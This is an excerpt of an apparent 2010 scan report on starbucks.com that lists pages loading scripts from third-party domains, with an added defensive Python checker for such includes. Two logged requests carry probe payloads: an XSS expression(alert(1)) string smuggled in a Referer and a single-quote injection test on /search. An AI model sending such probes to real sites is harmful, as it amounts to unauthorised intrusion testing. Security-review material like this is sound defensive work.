<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.49. http://www.starbucks.com/menu/drinks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:13:04 GMT
Connection: close
Content-Length: 61777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.50. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:05 GMT
Connection: close
Content-Length: 50616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.51. http://www.starbucks.com/menu/food

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:13:12 GMT
Connection: close
Content-Length: 56666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.52. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-bliss-bar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/cranberry-bliss-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:25 GMT
Connection: close
Content-Length: 41067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.53. http://www.starbucks.com/menu/nutrition

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:13:23 GMT
Connection: close
Content-Length: 48524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.54. http://www.starbucks.com/menu/nutrition/20-under-200

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition/20-under-200 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:24:04 GMT
Content-Length: 38032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.55. http://www.starbucks.com/menu/nutrition/35-under-350

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition/35-under-350 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:15:03 GMT
Connection: close
Content-Length: 40567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.56. http://www.starbucks.com/responsibility

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:25 GMT
Connection: close
Content-Length: 56642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>


           <script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"> </script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
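
Every entry in this section (10.55 through 10.79) reports the same condition: the page pulls a script from a host the site does not control (s7.addthis.com, widgets.twimg.com, ajax.googleapis.com, platform.twitter.com, ecn.dev.virtualearth.net, edge.quantserve.com), and that script runs with the including page's origin. Whoever controls the third-party host, or can tamper with the plain-http fetch on the wire, can therefore execute JavaScript as starbucks.com. The checker below is an added example, not part of this report or of the scanner that produced it. It reproduces the finding on a constructed HTML body modelled on the response snippets above and adds the two checks a reviewer wants next: whether the tag pins the file with a Subresource Integrity `integrity` attribute, and whether it is fetched over https. The sample page URL, the `/scripts/site.js` path and the `sha384-AAAA` placeholder value are illustrative assumptions.

```python
"""Flag cross-domain <script src> includes in an HTTP response body.

Added example (not part of the scan report or of the scanner behind it).
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptCollector(HTMLParser):
    """Collect the attributes of every <script ...> start tag."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append(dict(attrs))  # attribute names arrive lowercased


def cross_domain_scripts(page_url, html):
    """Return [(resolved_src, has_integrity, is_https)] for each script whose
    host differs from the host of page_url.  Relative and protocol-relative
    (//host/...) sources are resolved against page_url first.  The fragment
    (e.g. "#username=starbucks") stays in the resolved URL but plays no part
    in the host comparison, since the browser never sends it to the server."""
    page_host = urlsplit(page_url).netloc.lower()
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.scripts:
        src = attrs.get("src")
        if not src:
            continue  # inline script: same origin by definition
        resolved = urljoin(page_url, src.strip())
        parts = urlsplit(resolved)
        if parts.scheme not in ("http", "https"):
            continue  # data:, javascript: and similar are out of scope here
        if parts.netloc.lower() != page_host:
            findings.append((resolved, "integrity" in attrs, parts.scheme == "https"))
    return findings


def sri_value(script_bytes, algo="sha384"):
    """Compute the value for an integrity= attribute over the exact bytes the
    browser will receive: "<algo>-<base64 digest>".  Pinned in the <script>
    tag, a changed third-party file is refused instead of executed."""
    digest = hashlib.new(algo, script_bytes).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


# Constructed sample modelled on the response snippets in the report; it is
# not a captured response.  /scripts/site.js and the sha384-AAAA placeholder
# are assumptions made for the example.
SAMPLE_URL = "http://www.starbucks.com/responsibility"
SAMPLE_HTML = """
<html><head>
<script type="text/javascript" src="/scripts/site.js"></script>
<script type="text/javascript">var inline = 1;</script>
</head><body>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
<script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"> </script>
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script src="https://platform.twitter.com/widgets.js" integrity="sha384-AAAA"></script>
</body></html>
"""

if __name__ == "__main__":
    for src, has_sri, https in cross_domain_scripts(SAMPLE_URL, SAMPLE_HTML):
        flags = []
        if not has_sri:
            flags.append("no SRI")
        if not https:
            flags.append("plain http")
        print(f"{src}  [{', '.join(flags) or 'ok'}]")
    # What a real integrity value looks like for a given served body:
    print(sri_value(b"alert(1)"))
```

Run stand-alone, the script lists the four cross-domain includes in the sample and skips the same-origin and inline ones; the three `http://` tags come out flagged both "no SRI" and "plain http", while the pinned https twitter.com tag passes. The `sha384-AAAA` value in the sample is only a placeholder; `sri_value` shows how the real one is derived from the bytes the third party actually serves, which is also why SRI does not help for scripts whose content legitimately changes on every fetch.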

10.57. http://www.starbucks.com/responsibility/community

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:24 GMT
Connection: close
Content-Length: 40095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.58. http://www.starbucks.com/responsibility/community/community-service

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/community-service

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/community-service HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:35 GMT
Connection: close
Content-Length: 37177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.59. http://www.starbucks.com/responsibility/community/starbucks-foundation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/starbucks-foundation HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:44:59 GMT
Connection: close
Content-Length: 39028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.60. http://www.starbucks.com/responsibility/community/starbucks-red

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/starbucks-red HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:43:46 GMT
Connection: close
Content-Length: 41532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.61. http://www.starbucks.com/responsibility/community/youth-action

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/youth-action HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:40:44 GMT
Connection: close
Content-Length: 40134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.62. http://www.starbucks.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search?keywords=%27 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:11 GMT
Content-Length: 33615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.63. http://www.starbucks.com/share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /share

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /share HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Tue, 16 Nov 2010 18:15:03 GMT
Last-Modified: Tue, 16 Nov 2010 18:14:03 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:03 GMT
Connection: close
Content-Length: 22873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

10.64. http://www.starbucks.com/share/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /share/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /share/ HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Tue, 16 Nov 2010 18:19:43 GMT
Last-Modified: Tue, 16 Nov 2010 18:18:43 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:42 GMT
Connection: close
Content-Length: 22873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

10.65. http://www.starbucks.com/site-map

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site-map HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
